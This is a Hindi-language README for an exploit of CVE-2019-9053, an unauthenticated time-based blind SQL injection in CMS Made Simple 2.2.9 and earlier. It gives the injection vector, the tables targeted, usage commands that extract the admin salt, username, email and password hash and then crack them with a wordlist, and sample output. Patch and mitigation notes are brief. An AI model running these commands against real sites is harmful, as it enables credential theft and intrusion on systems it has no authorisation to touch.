
CVE-2019-9053 के लिए स्वचालित शोषण, CMS Made Simple ≤2.2.9 में समय-आधारित ब्लाइंड SQL इंजेक्शन। व्यवस्थापक क्रेडेंशियल्स (उपयोगकर्ता नाम, ईमेल, पासवर्ड हैश + सॉल्ट) निकालता है और वैकल्पिक रूप से पासवर्ड को ऑफलाइन क्रैक करता है।
CVE-2019-9053 एक time-based blind SQL इंजेक्शन कमजोरी है जो CMS Made Simple के ≤ 2.2.9 संस्करणों को प्रभावित करती है। इसमें प्रमाणीकरण की आवश्यकता नहीं है।
कमजोर पैरामीटर News मॉड्यूल (moduleinterface.php) में m1_idlist है। हमलावर इसका उपयोग करके एडमिन के पासवर्ड हैश, उपयोगकर्ता नाम, ईमेल और हैश के लिए उपयोग किए गए salt को निकाल सकता है।
पासवर्ड भंडारण योजना MD5(salt + password) है, जहाँ salt 8 बाइट का होता है। इससे हैश और salt प्राप्त करने के बाद, hashcat या John the Ripper जैसे उपकरणों से ऑफलाइन पासवर्ड क्रैक करने का प्रयास किया जा सकता है।
CVSS 3.1: 7.5 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Daniele Scanu — @Certimeter Group
मूल एक्सप्लॉइट Exploit-DB #46635 पर उपलब्ध है।
requests, termcolorpip2 install requests termcolor
# क्रेडेंशियल निकालें (salt, उपयोगकर्ता, ईमेल, पासवर्ड हैश)
python 46635.py -u http://target/cmsms
# क्रेडेंशियल निकालें और वर्डलिस्ट के साथ पासवर्ड क्रैक करने का प्रयास करें
python 46635.py -u http://target/cmsms --crack -w /path/to/rockyou.txt
एक्सप्लॉइट SLEEP() वाले SQL पेलोड के साथ HTTP अनुरोध भेजता है ताकि अक्षर-दर-अक्षर निर्धारित किया जा सके:
cms_siteprefs से salt निकालता है जहाँ sitepref_name = 'sitemask'cms_users से उपयोगकर्ता नाम निकालता है जहाँ user_id = 1cms_users से हैश निकालता हैMD5(salt + password) के विरुद्ध परीक्षण करता है[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: [email protected]
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
moduleinterface.php तक पहुँच प्रतिबंधित करें| फ़ील्ड | मान |
|---|
| CVE | CVE-2019-9053 |
| उत्पाद | CMS Made Simple |
| प्रभावित संस्करण | ≤ 2.2.9 |
| प्रकार | Time-based Blind SQL Injection (CWE-89) |
| प्रमाणीकरण | आवश्यक नहीं |
| वेक्टर | moduleinterface.php?mact=News,m1_,default,0&m1_idlist= |
| प्रभाव | क्रेडेंशियल निकासी (उपयोगकर्ता, ईमेल, पासवर्ड हैश + salt) |
| CVSS 3.1 | 7.5 HIGH |
| पैच | CMS Made Simple 2.2.10 |
| पैरामीटर | विवरण |
|---|
-u / --url | CMS का बेस URL (जैसे http://10.10.10.100/cms) |
-w / --wordlist | पासवर्ड क्रैक करने के लिए वर्डलिस्ट (वैकल्पिक) |
-c / --crack | पासवर्ड क्रैकिंग मोड सक्रिय करें |